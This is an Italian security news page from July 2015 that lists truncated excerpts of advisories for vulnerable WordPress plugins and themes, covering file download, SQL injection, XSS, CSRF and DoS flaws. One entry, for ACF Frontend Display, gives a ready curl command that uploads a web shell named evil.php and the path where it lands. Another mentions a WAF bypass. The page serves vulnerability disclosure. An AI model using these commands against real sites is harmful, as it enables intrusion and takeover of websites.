WordPress Image Export 1.1 Arbitrary File Download

16 luglio 2015 - Fonte: http://www.mondounix.com
Title: Remote file download vulnerability in Wordpress Plugin image-export v1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-01
Download Site: https://wordpress.org/plugins/image-export
Vendor: www.1efthander.com
Vendor Notified: 2015-07-05
Vendor Contact: https://twitter.com/1eftHander
Description: Image Export plugin can help you selectively download images uploaded by an administrator .
Vulnerability:
The code in file download.php doesn't do any checking that the user is requesting files from the uploaded images directory only.  And line 8 attempts to
unlink the file after being downloaded.  This script could be used to delete files out of the wordpress directory if file permissions allow.
 
      1 <?php
     ...

Leggi il seguito »

WordPress WP-PowerPlayGallery 3.3 File Upload / SQL Injection

16 luglio 2015 - Fonte: http://www.mondounix.com
Title: Remote file upload vulnerability & SQLi in wordpress plugin wp-powerplaygallery v3.3
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-27
Download Site: https://wordpress.org/plugins/wp-powerplaygallery
Vendor: WP SlideShow
Vendor Notified: 2015-06-29
Advisory: http://www.vapid.dhs.org/advisory.php?v=132
Vendor Contact: plugins@wordpress.org
Description: This is the best gallery for touch screens. It is fully touch enabled with great features. This gallery is compatible wiht iphone and ipads. It is also allow us to use it as a widget.You can also enable this Powerplay Gallery on your wordpress site by placing code snippet in your template (.php) files. It shows flash gallery for desktops and touch enabled version for ipad...

Leggi il seguito »

WordPress Twenty Fifteen 4.2.1 Cross Site Scripting

13 luglio 2015 - Fonte: http://www.mondounix.com
Information
--------------------
Advisory by Netsparker.
Name: DOM XSS Vulnerability in Twenty Fifteen WordPress Theme
Affected Software : WordPress
Affected Versions: 4.2.1 and probably below
Vendor Homepage : https://wordpress.org/ and
https://wordpress.org/themes/twentyfifteen/
Vulnerability Type : DOM based Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-3429
Netsparker Advisory Reference : NS-15-007
 
Description
--------------------
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user’s session. This means that the malicious
hacker can change the logged in user’s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the...

Leggi il seguito »

WordPress PictoBrowser 0.3.1 CSRF / XSS

13 luglio 2015 - Fonte: http://www.mondounix.com
**************************************************************************************
# Title: CSRF / Stored XSS Vulnerability in PictoBrowser Wordpress Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9392
# Plugin Homepage: https://wordpress.org/plugins/pictobrowser-gallery/
# Version Affected: 0.3.1 (probably lower versions)
# Severity: High 
 
# Description: 
Vulnerable Parameter: all text boxes, to name one - pictoBrowserFlickrUser
Vulnerability Class: 
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# About Vulnerability:  This plugin is vulnerable to a combination of CSRF/XSS attack meaning...

Leggi il seguito »

WordPress WP-SwimTeam 1.44.10777 Arbitrary File Download

13 luglio 2015 - Fonte: http://www.mondounix.com
Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-02
Download Site: https://wordpress.org/plugins/wp-swimteam
Vendor: Mike Walsh www.MichaelWalsh.org
Vendor Notified: 2015-07-02, fixed in v1.45beta3
Vendor Contact: Through website
Advisory: http://www.vapid.dhs.org/advisory.php?v=134
Description: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.
Vulnerability:
The code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files:
 
 
 50             $file = urldecode($args['file'])...

Leggi il seguito »

WordPress CP Contact Form With Paypal 1.1.5 CSRF / XSS / SQL Injection

13 luglio 2015 - Fonte: http://www.mondounix.com
# Title: Cross-Site Request Forgery, Cross-Site Scripting and SQL Injection
in CP Contact Form with Paypal Wordpress Plugin v1.1.5
# Submitter: Nitin Venkatesh
# Product: CP Contact Form with Paypal Wordpress Plugin
# Product URL: https://wordpress.org/plugins/cp-contact-form-with-paypal/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site
scripting[CWE-79], Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection')[CWE-89]
# Affected Versions: v1.1.5 and possibly below.
# Tested versions: v1.1.5
# Fixed Version: v1.1.6
# Link to code diff:
https://plugins.trac.wordpress.org/changeset?new=1166955%40cp-contact-form-with-paypal&old=1162550%40cp-contact-form-with-paypal
# Changelog:
https://wordpress.org/plugins/cp-contact-form-with-paypal/changelog/
#...

Leggi il seguito »

WordPress Easy2Map-Photos 1.09 SQL Injection

13 luglio 2015 - Fonte: http://www.mondounix.com
Title: SQL Injection in easy2map-photos wordpress plugin v1.09
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map-photos
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.1.0
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=130
Description: Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.
Vulnerability:
The following lines in includes/Functions.php are vulnerable to SQL injection attack because they aren’t parameterized or sanitizing user input.
 
48         $wpdb->query(sprintf("UPDATE $mapsTable
49         SET PolyLines = '%s'
50...

Leggi il seguito »

WordPress WP-Ecommerce-Shop-Styling 2.5 File Download

13 luglio 2015 - Fonte: http://www.mondounix.com
Title: Remote file download vulnerability in wordpress plugin wp-ecommerce-shop-styling v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-05
Download Site: https://wordpress.org/plugins/wp-ecommerce-shop-styling
Vendor: https://profiles.wordpress.org/haet/
Vendor Notified: 2015-07-05, fixed in version 2.6.
Vendor Contact: http://wpshopstyling.com
Description: Customize your WP ecommerce store with HTML mail templates, message content, transaction results and PDF invoices with WYSIWYG editor and placeholders.
Vulnerability:
The code in ./wp-ecommerce-shop-styling/includes/download.php doesn't sanitize user input to prevent sensitive system files from being downloaded.
 
 
1 <?php
2 require_once("../../../../wp-admin/admin.php");
3...

Leggi il seguito »

WordPress ACF Frontend Display Shell Upload

13 luglio 2015 - Fonte: http://www.mondounix.com
+---------------------------------------------------------------------------+ 
#[+] Author: TUNISIAN CYBER 
#[+] Title: WP Plugin Free ACF Frontend Display File Upload Vulnerability 
#[+] Date: 3-07-2015 
#[+] Type: WebAPP 
#[+] Tested on: KaliLinux 
#[+] Friendly Sites: sec4ever.com 
#[+] Twitter: @TCYB3R 
+---------------------------------------------------------------------------+ 
 
curl -k -X POST -F "action=upload" -F "files=@/root/Desktop/evil.php" "site:wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php" 
 
File Path: 
site/wp-content/uploads/uigen_YEAR/file.php 
 
Example: 
site/wp-content/uploads/uigen_2015/evil.php 
 
evil.php:...

Leggi il seguito »

WordPress Vulcan Theme XSS / Disclosure/ DoS

13 luglio 2015 - Fonte: http://www.mondounix.com
-------------------------
Affected products:
-------------------------
 
Vulnerable are all versions of Vulcan theme for WordPress (in last versions 
there were fixed only vulnerabilities in TimThumb, but there are still FPD 
in other php-files).
 
Since version TimThumb 2.8 all vulnerabilities are fixed (in timthumb.php). 
But AoF and DoS holes are fixed by disabling external hosts by default. If 
to change settings (to allow individual or all external hosts), which is 
allowed by software, then it's possible to conduct attacks on other sites. 
E.g. with using of DAVOSET.
 
WAF bypass:
 
At many sites unfixed version of TimThumb in theme is used, but they protect 
themselves using WAF (such as ModSecurity)....

Leggi il seguito »